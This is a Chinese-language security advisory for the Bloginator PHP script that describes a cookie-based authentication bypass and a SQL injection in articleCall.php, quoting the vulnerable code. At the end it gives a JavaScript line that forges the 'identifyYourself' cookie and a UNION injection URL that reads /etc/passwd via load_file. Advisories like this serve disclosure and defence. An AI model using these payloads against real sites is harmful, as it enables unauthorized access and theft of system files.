BUGTRAQ ID: 34187
CVE(CAN) ID: CVE-2009-1050,CVE-2009-1049
Bloginator是一套PHP脚本,允许用户在网站上显示、添加、编辑和删除文章。
Bloginator没有正确地验证认证cookie,远程攻击者可以通过修改identifyYourself cookie参数绕过安全限制获得非授权访问。以下是有漏洞的代码段:
[URL] www.site.com/bloginator/articleCall.php
global $name,$password,$returnLink;
$p_name = strip_tags(substr($_POST['name'],0,32));
$p_password = strip_tags(substr($_POST['password'],0,32));
if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password )
{
setcookie(\"identifyYourself\",\"you are identified\");
print \"Login successfull<br>\";
print $returnLink;
}
else {print "Wrong username or password";
}
}
Bloginator的articleCall.php模块没有正确的验证对id参数所传送的输入参数,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击。以下是有漏洞的代码段:
[URL] www.site.com/bloginator/articleCall.php
$action = @$_GET['action'];
[…]
$id = $_GET['id'];
[…]
function editArticle($id,$message)
{
global $returnLink;
$query = "select * FROM articles WHERE id='$id'";
$sql = mysql_query($query) or die(mysql_query());
$title = mysql_result($sql,0,'title');
$title = htmlentities($title);
$article = mysql_result($sql,0,'article');
$article = htmlentities($article);
$link = mysql_result($sql,0,'link');
$link = htmlentities($link);
startHTML("Edit ID # ".$id);
?>
kamAds.com Bloginator 1A
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://kamads.com/kamads_ads/bloginator.php” target=“_blank”>http://kamads.com/kamads_ads/bloginator.php</a>
javascript:document.cookie = \"identifyYourself=you+are+identified; path=/\";
www.site.com/action=edit&id=fireshot\' union select 1,2,3,4,load_file(\'/etc/passwd\'),6,7 order by \'*
http://www.milw0rm.com/exploits/8244